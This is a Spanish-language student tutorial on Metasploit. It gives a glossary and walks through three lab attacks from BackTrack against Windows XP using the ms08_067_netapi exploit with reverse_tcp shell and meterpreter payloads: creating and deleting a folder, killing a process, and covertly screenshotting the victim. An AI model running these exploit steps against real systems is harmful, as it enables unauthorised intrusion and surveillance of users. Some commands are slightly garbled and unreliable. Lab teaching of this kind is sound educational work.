1.- ¿QUÉ ES?

Lo definiremos como una herramienta GNU escrita en Perl y con utilización de diversos lenguajes de programación como C, Python, ASM, entre otros. Este se  ejecuta bajo una consola CYGWIN.

Para tenerlo bien claro definiremos un pequeño glosario de lo utiliza Metasploit:


FrameWork: En el desarrollo de software, un Framework es una estructura de soporte definida en la cual otro proyecto de software puede ser organizado y desarrollado. Un framework puede incluir soporte de programas, librerías y un lenguaje de scripting entre otros softwares para ayudar a desarrollar y unir los diferentes componentes de un proyecto.

Exploit: Viene de to exploit “aprovechar”. Código escrito con el fin de aprovechar un error de programación para obtener diversos privilegios.

Shell: Parte fundamental de un sistema operativo encargada de ejecutar las órdenes básicas para el manejo del sistema. Suelen incorporar características tales como control de procesos, redirección de entrada/salida y un lenguaje de órdenes para escribir programas por lotes o scripts.

GNU: Es un acrónimo recursivo que significa “GNU No es Unix”. Se sugiere que se pronuncie Ñu. UNIX es un sistema estable. Fue diseñado para ser totalmente compatible con UNIX.

CYGWIN: Es una consola UNIX emulada bajo entornos no Unix, como son Windows y Mac, en ella se encuentran todos los comandos unix y funciona de la misma manera.

2.- ¿Cómo  Trabaja?

Con una base de datos en la cual se encuentran toda la lista de exploits y vulnerabilidades, lo único que tenemos que indicarle a Metasploit es que vulnerabilidad, sistema y que tipo de ataque utilizaremos y datos diversos que utilizara para atacar al host.

Se llama Metasploit Framework porque es todo un entorno de testeo para diversas plataformas, la cual trabaja con librerías, bases de datos, y diversos programas, shell, codes, etc. Por tal deja de ser un simple software.

3.- Modalidades

Antes que nada Metasploit puede ser descargado de:

http://www.metasploit.com/

Trabaja en 2 modalidades las cuales se pueden ejecutar en todas las plataformas y para elegir una es cuestión de gustos y comodidad.

3.1 Modo Web

Esta modalidad de Metasploit es una manera muy cómoda de trabajar ya que aquí toda la interface es web y no tienes que escribir mucho, todo lo demás consiste en seleccionar opción por opción y al final solo presionar un botón de “Exploit” para comenzar con el ataque, también tiene su modalidad de ataque por Shell el cual lo maneja por secciones, para entrar a este modo, lo único que se tiene que hacer es abrir el archivo msfweb.bat de Metasploit, lo cual hará que aparezca un mensaje como este:

+—-=[ Metasploit Framework Web Interface (127.0.0.1:55555)

Una vez mostrado este mensaje solo es de ir a cualquier navegador web y entrar a la dirección http://127.0.0.1:55555, y desde esta página realizar los ataques y trabajo con Metasploit.

 

Nota: Si cierras la consola msfweb.bat la página web dejara de cargar, es necesario que este en ejecución para hacer tus ataques.

3.2 Modo Consola

El modo de consola de Metasploit aunque es un poco más engorroso trabajar con él, suele funcionar de una manera más rápida y a veces mejor, para ejecutarlo, tienes que ejecutar el archivo msfconsole.bat de la carpeta de Metasploit. E ir trabajando por medio de comandos en lugar de una interface:

4.- ¿Cuál es el Objetivo?

Es el desarrollo, testeo, mejora y penetración a diversos sistemas, entre ellos Windows.

5.- Diagramas

Esquema común en la web:

Esquema Usado en Nuestra Demostración:

 

6.-  Ataques de CREACIÓN Y BORRADO DE CARPETAS, ELIMINACIÓN DE PROCESOS, SCREENSHOT

 

Para la siguiente demostración debemos instalar los sistemas operativos:

  • Back Track 5 (ATACANTE).

  • Windows XP SP3 (VÍCTIMA).

Recomendación: En general previo a todos los procedimientos para atacar, debemos considerar que la red entre las maquinas ya esté establecida (haciéndole los respectivos ping) y al mismo tiempo abrir las herramientas del Metasploit.

Siga los pasos que se muestran a continuación para realizar los mencionados ATAQUES METASPLOIT:

6.1 CREACIÓN Y BORRADO DE CARPETAS

A manera general se realiza una simple creación y borrado de carpetas cualquiera  pero mediante un “Shell” para entender mejor el termino se refiere específicamente al manejo del sistema operativo  es decir ejecuta las órdenes básicas de este y vamos a acceder sin que el usuario de la maquina víctima se dé cuenta.

Se siguen los pasos detallados a continuación:

1.-     Digitamos la siguiente ruta para que se ubique en modo consola: msfconsole

2.-    A continuación digitamos la siguiente ruta: use exploit/windows/smb/ms08_067_netapi

3.-    El prompt de la consola, que antes solo decía “msf”, ahora cambiara, y debemos escribir ahí esta ruta: set payload windows/ shell /reverse_tcp

4.-   Escribimos el comando set rhost <IP VÍCTIMA> en nuestro caso será 192.168.70.7 y  el comando especifico será: set rhost 192.168.70.7

5.-    Escribimos el comando set lhost <IP ATACANTE> en nuestro caso será  192.168.70.5 y el comando especifico será: set lhost 192.168.70.5

6.-   Con los parámetros ya configurados, hacemos que Back Track lance el ataque con la instrucción: exploit

7.-    Se mostraran una serie de líneas que nos indican que se están creando las respectivas sesiones que permiten perpetrar el respectivo ataque.

8.-   En el nuevo prompt, nos daremos cuenta que ahora dirá “C:\”, esto quiere decir que ya accesamos al sistema de Windows.

9.-    Para salir del sistema y ubicarnos en el directorio C: ejecutamos el comando cd\

10.- Una vez adentro procedemos a crear nuestra carpeta con el comando mkdir<nombre del archivo> a la cual llamaremos hacker y el comando especifico será: mkdir hacker

11.-   Una vez hecho esto vamos a nuestra maquina victima a Mi PC accedemos a Disco Local C: y vemos que se ha creado exitosamente nuestra carpeta hacker

12.- Regresamos al Back Track y procedemos a eliminar la carpeta creada y ejecutamos el comando rmdir<nombre del archivo> a la cual llamamos hacker y el comando especifico será: rmdir hacker

13.- Regresamos nuevamente al Windows y vemos que se ha borrado exitosamente nuestra carpeta hacker. Y Listo ese es todo el ataque!!!.

Posible Problema: Se nos podría presentar algunos problemas uno de esto sería que digitemos algún comando mal y nos salga que falló algún modulo “Failed to load module”;  o que se completó el exploit pero que no se creó la sesión “Exploit completed, but no session was created” y así varios que básicamente se remiten a errores de sintaxis.

Solución Rápida: Dominar un poco el inglés e interpretar lo que nos dice o lo más óptimo sería buscar un traductor ya sea este un ejecutable o en la web y en el caso de que no se estableció la sesión podría ser que la Máquina Víctima no se encuentra prendida o no está en red.

6.2 ELIMINACIÓN DE PROCESOS

Hay que destacar que seguimos en el shell siga los pasos detallados a continuación:

1.-      Digitamos la siguiente ruta para que se ubique en modo consola: msfconsole

2.-    A continuación digitamos la siguiente ruta: use exploit/windows/smb/ms08_067_netapi

3.-    El prompt de la consola, que antes solo decía “msf”, ahora cambiara, y debemos escribir ahí esta ruta: set payload windows/meterpreter/reverse_tcp

4.-    Escribimos el comando set rhost <IP VÍCTIMA> en nuestro caso será 192.168.70.7 y  el comando especifico será: set rhost 192.168.70.7

5.-    Escribimos el comando set lhost <IP ATACANTE> en nuestro caso será  192.168.70.5 y el comando especifico será: set lhost 192.168.70.5

6.-    Con los parámetros ya configurados, hacemos que Back Track lance el ataque con la instrucción: exploit

7.-     Se mostraran una serie de líneas que nos indican que se están creando las respectivas sesiones que permiten perpetrar el respectivo ataque.

8.-    En el nuevo prompt, que ahora dirá “meterpreter”, digitamos la instrucción ps

9.-    Se muestra una serie de códigos, junto al proceso que representan en la maquina victima; es decir, nos permitirá ver los procesos activos de la maquina victima los cuales podemos cerrar.

10.- Vamos a Windows y abrimos el cmd

11.-   Regresamos al Back Track y volvemos a digitar la instrucción ps

12.-  Se deberá añadir el proceso del cmd.exe

13.-  Procedemos a escribir la instrucción kill <NUMERO DE PROCESO>, donde NUMERO DE PROCESO es algún proceso de Windows que está corriendo en este momento en nuestro caso vamos a matar el proceso del cmd y el comando específico será: kill 3144

14.- Regresamos al windows y nos damos cuenta que se cerró el cmd. Y listo ese es el ataque!!!.

Nota: Deben tener en cuenta que no en todas las maquinas vienen definidos los mismos números de puertos por eso listamos con la instrucción “ps” para chequear específicamente el puerto deseado.

6.3 ATAQUE DE SCREENSHOT

 

Para tenerlo más claro un screenshot nos permite, de manera sigilosa, “tomar una foto” de la acción que esté realizando el usuario, y tener conocimiento de la clase de acciones que toma mientras está conectado a una red.  Por ejemplo, si queremos saber qué tipo de acciones realiza el usuario mientras esta en el directorio C: podemos tomar un screenshot de todo el contenido de este sin que se dé cuenta.

Se siguen los pasos detallados a continuación:

1.-     Digitamos la siguiente ruta para que se ubique en modo consola: msfconsole

2.-    A continuación digitamos la siguiente ruta: use exploit/windows/smb/ms08_067_netapi

3.-    El prompt de la consola, que antes solo decía “msf”, ahora cambiara, y debemos escribir ahí esta ruta: set payload windows/meterpreter/reverse_tcp

4.-   Escribimos el comando set rhost <IP VÍCTIMA> en nuestro caso será 192.168.70.7 y  el comando especifico será: set rhost 192.168.70.7

5.-    Escribimos el comando set lhost <IP ATACANTE> en nuestro caso será  192.168.70.5 y el comando especifico será: set lhost 192.168.70.5

6.-   Con los parámetros ya configurados, hacemos que Back Track lance el ataque con la instrucción: exploit

7.-    Se mostraran una serie de líneas que nos indican que se están creando las respectivas sesiones que permiten perpetrar el respectivo ataque.

8.-   En el nuevo prompt, que ahora dirá “meterpreter”, digitamos la instrucción ps

9.-    Se muestra una serie de códigos, junto al proceso que representan en la maquina victima; es decir, nos permitirá ver los procesos activos de la maquina victima a los que podemos tomarles un screenshot.

10.- Se escribe la instrucción migrate <PUERTO>, donde PUERTO es el número de proceso de alguna tarea en Windows en nuestro caso vamos a tomarle una foto a explorer.exe y el comando específico será: migrate 1396.

Nota: Deben tener en cuenta que no en todas las maquinas vienen definidos los mismos números de puertos por eso listamos con la instrucción “ps” para chequear específicamente el puerto deseado.

11.-   Se espera a que se migre al respectivo puerto a la espera de la siguiente orden, y una vez realizado el proceso, se escribe la instrucción use espia.

12.- La instrucción anterior empezara a hacer un sniffing sobre el puerto determinado.  Para tomar el screenshot respectivo, digitamos screenshot /<nombre del archivo><extensión del archivo> en nuestro caso lo llamaremos cap_info.bmp y el comando especifico será: screenshot / cap_info.bmp

Nota: Tenga presente que esta extensión siempre será .bmp

13.- La imagen tomada se guardara en una ruta de Back Track, la cual por lo general es: /root/ FumrxHxC.jpg

Nota: Tenga en cuenta que el nombre y la extensión de la foto se ha cambiado automáticamente a FumrxHxC.jpg esto lo hace el Back Track.

14.- Y listo ese es todo el ataque!!!.

OjO: Si se fijan en los ejemplos mencionados cabe destacar que en general se ejecutan los mismos pasos básicamente pero cada de estos ataques tienen comandos específicos que hacen que se diferencien los unos de los otros.

Dejamos aquí algunos videos relacionados con lo explicado anteriormente:

  • Chequeo IP:

http://www.youtube.com/watch?v=NDrmc647q3A

  • Ataque de creación y borrado de carpetas:

http://www.youtube.com/watch?v=Mp2B0uCzyt4

  • Ataque de eliminación de procesos:

http://www.youtube.com/watch?v=__b4FI1Pi8w

  • Ataque de SCREENSHOT:

http://www.youtube.com/watch?v=GXES1RTvAm4

Esperamos que sean de mucha ayuda!!!.

Grupo #7: Metasploit

Ronald Arguello
José Carbo
Oswaldo Giler
Armando Martillo
Evelyn Márquez
Gianella Tamayo

Fuentes:

  • Archivo pdf:

metasploit

  • Documento de word:

Metasploit